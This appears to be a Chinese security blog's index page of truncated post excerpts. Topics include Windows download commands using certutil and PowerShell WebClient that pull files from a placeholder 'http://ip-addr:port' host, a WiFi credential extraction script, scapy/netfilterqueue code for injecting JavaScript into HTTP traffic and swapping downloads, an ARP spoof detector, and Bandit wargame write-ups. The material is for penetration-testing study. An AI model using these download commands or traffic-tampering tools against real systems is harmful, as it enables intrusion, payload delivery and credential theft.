摘要:
from socket import socket import socketserver import sys class MyTCPRequestHandler(socketserver.StreamRequestHandler): def handle(self) -> None: while 阅读全文
摘要:
目标机器为Windows: Certutil.exe certutil -urlcache -split -f "http://ip-addr:port/file" [output-file] Powershell powershell -c (New-Object Net.WebClient).D 阅读全文
摘要:
Certutil.exe 是一个命令行程序,作为证书服务的一部分安装。可以使用 certutil.exe 转储和显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件以及验证证书、密钥对和证书链。 但是渗透测试人员可以利用该命令行程序从目标网站下载任何文件(比如特定用途的可执行文 阅读全文
摘要:
import subprocess import sys import json import os import optparse import re class WiFiNetworksCredentials: def __init__(self) -> None: self.filename 阅读全文
摘要:
from scapy.all import * import sys import optparse import termcolor class ARPSpoofDetector: def __init__(self): self.interface = self.get_params() def 阅读全文
摘要:
在用Python进行一些Web相关的项目开发或者渗透测试时,一般来说先用手动方式对目标网站发起请求,查看相应的响应情况,在此基础上,需要对请求过程利用Python自动化,那么如何非常快速的将网页请求(里面涉及到很多的字段,比如URL, 请求方法,Cookie, Referer, 表单数据等等),下面 阅读全文
摘要:
利用本代码可以实现比如JS代码的插入或者修改. from scapy.all import * import netfilterqueue import sys import optparse import re class HTTPManipulate: def __init__(self) -> 阅读全文
摘要:
本代码基于面向对象思想编写,主要利用到的模块为netfilterqueue,以及scapy模块,前者主要是将iptables重定向过来的报文进行缓存,后者是对缓存队列的报文进行解析以及修改。 由于网络中HTTP访问请求以及响应很多,第一步如何识别出含有可执行文件的下载请求,这点通过分析报文load中 阅读全文
摘要:
级别:Bandit Level 8 → Level 9 目标:Level Goal The password for the next level is stored in the file data.txt and is the only line of text that occurs only 阅读全文
摘要:
级别:Bandit Level 7 → Level 8 目标:Level Goal The password for the next level is stored in the file data.txt next to the word millionth 密码保存在data.txt文件中,并 阅读全文